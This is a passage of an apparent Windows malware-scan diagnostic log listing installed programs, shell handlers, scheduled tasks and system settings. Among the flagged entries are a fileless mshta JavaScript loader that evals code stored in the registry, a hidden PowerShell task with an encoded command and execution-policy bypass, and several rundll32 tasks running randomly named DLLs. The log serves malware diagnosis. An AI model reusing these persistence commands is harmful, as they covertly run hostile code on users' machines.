Microsoft Office Proofing Tools 2013 Preview - English (HKLM\...\{20150000-001F-0409-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - Swedish (HKLM\...\{20150000-001F-041D-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.4.6577 - Mozilla)
MSI Afterburner 4.0.0 (HKLM-x32\...\Afterburner) (Version: 4.0.0 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mumble 1.2.10 (HKLM-x32\...\{BA360AD9-B847-48EF-A182-6345703284E9}) (Version: 1.2.10 - Thorvald Natvig)
Nidhogg (HKLM-x32\...\TmlkaG9nZw==_is1) (Version: 1 - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA 3D Vision Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.01 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.12.0.84 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.12.0.84 - NVIDIA Corporation)
NVIDIA Graphics Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.01 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Orbital Gear v1.3.3 (HKLM-x32\...\Orbital Gear_is1) (Version: 1.3.3 - OUTLAWS)
Origin (HKLM-x32\...\Origin) (Version: 9.11.5.17432 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
paint.net (HKLM\...\{F10AAD91-58DF-44EC-A647-810197141667}) (Version: 4.0.19 - dotPDN LLC)
Patch v4.17b Update (HKLM-x32\...\{THEGUILDREN-0010-2010-300520102330}_is1) (Version:  - RUNEFORGE Games Studios)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
pyfa version 1.5.1 (Oceanus 1.0) (HKLM-x32\...\{3DA39096-C08D-49CD-90E0-1D177F32C8AA}_is1) (Version: 1.5.1 (Oceanus 1.0) - pyfa)
qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)
R for Windows 3.2.2 (HKLM\...\R for Windows 3.2.2_is1) (Version: 3.2.2 - R Core Team)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.15.1104 - Razer Inc.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.67.1226.2012 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6954 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Redout (HKLM-x32\...\Redout_is1) (Version:  - )
Resident Evil 6 (HKLM-x32\...\Resident Evil 6_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
Resident Evil 7 Biohazard (HKLM-x32\...\{1ECBF8F3-7079-44CA-AD32-B2AECBCF636F}_is1) (Version:  - Capcom)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.0.6.1 - Rockstar Games)
RStudio (HKLM-x32\...\RStudio) (Version: 1.0.136 - RStudio)
RUSH Mechanical Keyboard (HKLM-x32\...\{A852EA21-FD88-4840-AE94-3243C9895325}}_is1) (Version:  - )
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.25.0 - SAMSUNG Electronics Co., Ltd.)
Satellite Reign (HKLM-x32\...\1428054996_is1) (Version: 2.7.0.11 - GOG.com)
ScummVM 1.8.1 (HKLM-x32\...\ScummVM_is1) (Version:  - The ScummVM Team)
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version:  - Microsoft)
Shadow Tactics - Blades of the Shogun (HKLM-x32\...\1601442230_is1) (Version: 2.0.0.3 - GOG.com)
Shift Happens version 1.0 (HKLM-x32\...\Shift Happens_is1) (Version: 1.0 - Klonk Games Deck13 FFF Bayern)
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
Smart Technology Programming Software 7.0.27.13 (HKLM\...\{BD90BC1C-115D-47E1-B85C-07AE182C3AB8}) (Version: 7.0.27.13 - Mad Catz)
Soldat 1.6.8 (HKLM-x32\...\Soldat_is1) (Version: 1.6.8 - Michal Marcinkowski)
Spybot - Search & Destroy (HKLM-x32\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.6.46 - Safer-Networking Ltd.)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
Stronghold Crusader Extreme HD (HKLM-x32\...\GOGPACKSTRONGHOLDCRUSADERHD_is1) (Version: 2.2.0.8 - GOG.com)
StrongholdCrusader (HKLM\...\{5a56ddf5-f2fd-4a53-b852-909002f9df30}.sdb) (Version:  - )
SumatraPDF (HKLM-x32\...\SumatraPDF) (Version: 2.4 - Krzysztof Kowalczyk)
Sunless Sea (HKLM-x32\...\1421064427_is1) (Version: 2.4.0.5 - GOG.com)
TeamViewer 10 (HKLM-x32\...\TeamViewer) (Version: 10.0.36244 - TeamViewer)
The Battle for Middle-earth ™ II (HKLM-x32\...\{2A9F95AB-65A3-432c-8631-B8BC5BF7477A}) (Version:  - )
The Guild 2 - Pirates of the European Seas (HKLM-x32\...\GOGPACKTHEGUILD2PIRATES_is1) (Version: 2.0.0.4 - GOG.com)
The Guild 2 - Renaissance (HKLM-x32\...\1207664873_is1) (Version: 2.0.0.1 - GOG.com)
The Last Door -  Collector's Edition (HKLM-x32\...\GOGPACKTHELASTDOOR_is1) (Version: 2.0.0.3 - GOG.com)
The Red Alert (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\The Red Alert) (Version: 1.2.0.0 - CNC Labs)
The Settlers 3 - Ultimate Collection (HKLM-x32\...\GOGPACKSETTLERS3_is1) (Version: 2.0.0.19 - GOG.com)
The Talos Principle (HKLM-x32\...\The Talos Principle_is1) (Version:  - )
The Walking Dead: Michonne (HKLM-x32\...\The Walking Dead: Michonne_is1) (Version:  - )
The Witness (HKLM\...\dGhld2l0bmVzcw_is1) (Version: 1 - )
The Wolf Among Us (HKLM-x32\...\The Wolf Among Us_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
Tom Clancy's Rainbow Six Vegas 2 (HKLM-x32\...\{FD416706-875C-4B0B-A23A-9E740DAE029E}) (Version: 1.03 - Ubisoft)
Torchlight 2 Rapid Respec (HKLM-x32\...\Torchlight 2 Rapid Respec) (Version: 2.04 - Chthon)
Torchlight II © Runic Games version 1 (HKLM-x32\...\Torchlight II © Runic Games_is1) (Version: 1 - )
ToxTrac (HKLM-x32\...\{3149DAFE-23F5-4907-BC83-9C4AA1661BD9}) (Version: 2.60 - Umeå University)
tpsDig2w64 version 2.19 (HKLM\...\tpsDig2w64_is1) (Version: 2.19 - )
Tribes Ascend (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF010}) (Version: 1.1.2860.0 - Hi-Rez Studios)
Tunngle (HKLM-x32\...\Tunngle_is1) (Version: 5.8.4 - Tunngle.net GmbH)
Ubisoft Game Launcher (HKLM-x32\...\{888F1505-C2B3-4FDE-835D-36353EBD4754}) (Version: 1.0.0.0 - UBISOFT)
Unity Web Player (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\UnityWebPlayer) (Version:  - Unity Technologies ApS)
Unravel™ (HKLM-x32\...\{5105E605-9EE7-4050-9CC0-005093BBF89A}) (Version: 1.0.0.0 - Electronic Arts, Inc.)
Unreal Tournament GOTY (HKLM-x32\...\GOGPACKUT_is1) (Version: 2.0.0.5 - GOG.com)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-00C1-0000-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Update for Skype for Business 2015 (KB4011678) 64-Bit Edition (HKLM\...\{90150000-012B-0409-1000-0000000FF1CE}_Office15.PROPLUS_{8E63F16F-BC60-413E-8ABA-DAD375D2C356}) (Version:  - Microsoft)
Uplay (HKLM-x32\...\Uplay) (Version: 25.0 - Ubisoft)
Walking Dead 2 (HKLM-x32\...\Walking Dead 2_is1) (Version:  - Audioslave)
VASSAL (3.2.15) (HKLM\...\VASSAL (3.2.15)) (Version: 3.2.15 - vassalengine.org)
Who's Your Daddy Alpha version 0.1.1 (HKLM-x32\...\{1BE05F6C-F9EB-491B-AE8A-A4B77F60DF4D}_is1) (Version: 0.1.1 - Joe Williams)
Vikings: Wolves of Midgard (HKLM-x32\...\Vikings: Wolves of Midgard_is1) (Version:  - )
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
WinDirStat 1.1.2 (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\WinDirStat) (Version:  - )
Windows Live ID Sign-in Assistant (HKLM\...\{9B48B0AC-C813-4174-9042-476A887592C7}) (Version: 6.500.3165.0 - Microsoft Corporation)
Windows XP Mode (HKLM\...\{1374CC63-B520-4f3f-98E8-E9020BF01CFF}) (Version: 1.3.7600.16423 - Microsoft Corporation)
WinRAR 5.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.00.0 - win.rar GmbH)
Virtual Audio Cable 4.13 (HKLM\...\Virtual Audio Cable 4.13) (Version:  - )
Vivaldi (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Vivaldi) (Version: 1.13.1008.40 - Vivaldi)
VoiceAttack (HKLM-x32\...\{FBABC026-02F7-46D5-A0F9-3D355D3C3133}) (Version: 1.5.7 - VoiceAttack.com)
Wolfenstein The Old Blood (HKLM-x32\...\Wolfenstein The Old Blood_is1) (Version:  - )
Wolfenstein: The New Order (HKLM-x32\...\V29sZmVuc3RlaW5UaGVOZXdPcmRlcg==_is1) (Version: 1 - )
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
ZTE Handset USB Driver (HKLM\...\{01D42BF0-ED08-463f-8A28-99EB6FEE962B}) (Version:  - ZTE Corporation)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\.DEFAULT\Software\Classes\3d878: "C:\Windows\system32\mshta.exe" "javascript:Qy2pqhd8="cGnOVdL4";bu1=new ActiveXObject("WScript.Shell");s7Wb7IoYn="JcVXE";HAb4P=bu1.RegRead("HKCU\\software\\dovquskjdo\\thbfcp");Z9MeKir="h8c665I";eval(HAb4P);d0jSmzjo4="b4pkxh7";" <==== ATTENTION
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_06.dll [2014-05-12] ()
ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers1: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation)
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2018-02-23] (NVIDIA Corporation)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-11-01] (Malwarebytes)
ContextMenuHandlers6: [SDECon32] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [SDECon64] -> {44176360-2BBF-4EC1-93CE-384B8681A0BC} => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDECon64.dll [2017-05-23] (Safer-Networking Ltd.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2013-08-22] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2013-08-22] (Alexander Roshal)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0BBD42E9-A2FA-4576-9890-D0C1FED0E844} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2018-01-10] (NVIDIA Corporation)
Task: {0BFE3D12-EE22-42E2-9D99-08E5014A0294} - System32\Tasks\ASUS\i-Setup225905 => C:\Windows\Intel-Chipset_Win7_8_VER9401017\AsusSetup.exe [2010-09-08] (ASUSTeK Computer Inc.)
Task: {0FEC692B-1674-436D-BBF8-596CCFF7468D} - System32\Tasks\{8D7BD5CC-F762-4C88-83D1-6E0E6114373E} => "c:\program files (x86)\mozilla firefox\firefox.exe" hxxp://ui.skype.com/ui/0/7.7.0.103/nl/abandoninstall?page=tsPlugin
Task: {13AA3023-6A6A-479F-A0A0-0E803510CA59} - System32\Tasks\wXkHuguozQzssiw2 => rundll32 "C:\Program Files (x86)\GveoMZenU\AmeWky.dll",#1
Task: {2816C76A-9AA6-4188-ACEB-4BE0C0DD0E90} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {2EE04458-0CAB-4DFB-ABB0-601043DBF441} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2018-01-10] (NVIDIA Corporation)
Task: {3091ED5C-5B9D-4A68-A3AC-9A27E05EA3A8} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2018-01-10] (NVIDIA Corporation)
Task: {3C201A85-C7D6-4A1C-AC4B-352926B536E5} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2018-01-10] (NVIDIA Corporation)
Task: {57D3EFB8-7DC5-4C47-933B-B64DA7804C52} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {584F7B10-0278-459B-8253-A225517D91AF} - System32\Tasks\OHurYzwpfZsLsh => rundll32 "C:\Program Files (x86)\pBsTWTvYOXtU2\oAhmxetWBkkyl.dll",#1
Task: {586E3E7E-04DD-4F50-BB9C-C8E54BFFCD13} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-06] (Adobe Systems Incorporated)
Task: {5ACD0E5E-1851-4D78-A828-E885A7A38D97} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {6230731C-1C18-4CF1-A20D-7132A76583D3} - System32\Tasks\{7F050547-040E-7E04-7811-0A0B797E1179} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAIAA7ACAAOwA7ADsAOwAgADsAIAAgACAAIAAgADsAIAA7ACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AIgBzAHQAbwBwACIAOwAkAHMAYwA9ACIAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAiADsAJABXAGEAcgBuAGkA (the data entry has 10064 more characters). <==== ATTENTION
Task: {79DFCC47-8C8D-4D07-8F11-E20BECC26092} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-09-28] (Piriform Ltd)
Task: {95D233E6-C06E-4569-BE35-EE1FF61B18E7} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {AB73D322-7316-4971-BE0D-4CA5E8D9C1DC} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2015-05-21] ()
Task: {AFE18389-F758-4DAC-8D9B-E3B57C98E691} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2018-01-10] (NVIDIA Corporation)
Task: {B22B3AE9-EA76-4331-A232-E8A08C28BF26} - System32\Tasks\VTsFYYvpoVEusFPoU2 => rundll32 "C:\Program Files (x86)\eDQUsUcxIryKmPtCCUR\JSkkqWG.dll",#1
Task: {BB369166-0B23-49CC-9856-AE0991891F5A} - System32\Tasks\oWotDXBujaUxMpNAqmS2 => rundll32 "C:\Program Files (x86)\zKUGIuVeiGvyC\fuIpEbs.dll",#1
Task: {C37FC464-71FD-406A-9BB1-351B799E500C} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => C:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation)
Task: {D7E118E8-48A4-4305-9518-2E81878767D6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {DF64ABAB-F7B0-43E8-9B1E-22A47ED36357} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {F25664B5-F21D-4C23-B584-2947A5D13292} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2018-01-10] (NVIDIA Corporation)
Task: {FC3DA8B1-316E-4796-A3FC-79A33A78BC4C} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-02-01] ()

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Check for updates (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
Task: C:\Windows\Tasks\Refresh immunization (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDImmunize.exe
Task: C:\Windows\Tasks\Scan the system (Spybot - Search & Destroy).job => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe

==================== Shortcuts & WMI ========================

(The entries could be listed to be restored or removed.)


==================== Loaded Modules (Whitelisted) ==============

2014-05-12 10:49 - 2014-05-12 10:49 - 000222720 _____ () C:\Program Files (x86)\Notepad++\NppShell_06.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

AlternateDataStreams: C:\Windows:E34B0F9ED3964806 [50]
AlternateDataStreams: C:\Users\Martin:Heroes & Generals [38]

==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Hamachi2Svc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMSwissArmy => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Option => "OptionValue"="1"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\europacasino.com -> www.europacasino.com
IE restricted site: HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\skype.com -> hxxps://apps.skype.com

==================== Hosts content: ===============================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2014-12-06 18:54 - 2014-12-06 18:54 - 000000000 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Martin\AppData\Roaming\DisplayFusion\Wallpaper_1
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)

==================== MSCONFIG/TASK MANAGER disabled items ==

MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: AeLookupSvc => 3
MSCONFIG\Services: ALG => 3
MSCONFIG\Services: AppIDSvc => 3
MSCONFIG\Services: AppMgmt => 3
MSCONFIG\Services: aspnet_state => 3
MSCONFIG\Services: AudioEndpointBuilder => 2
MSCONFIG\Services: AudioSrv => 2
MSCONFIG\Services: AxInstSV => 3
MSCONFIG\Services: BDESVC => 3
MSCONFIG\Services: BEService => 3
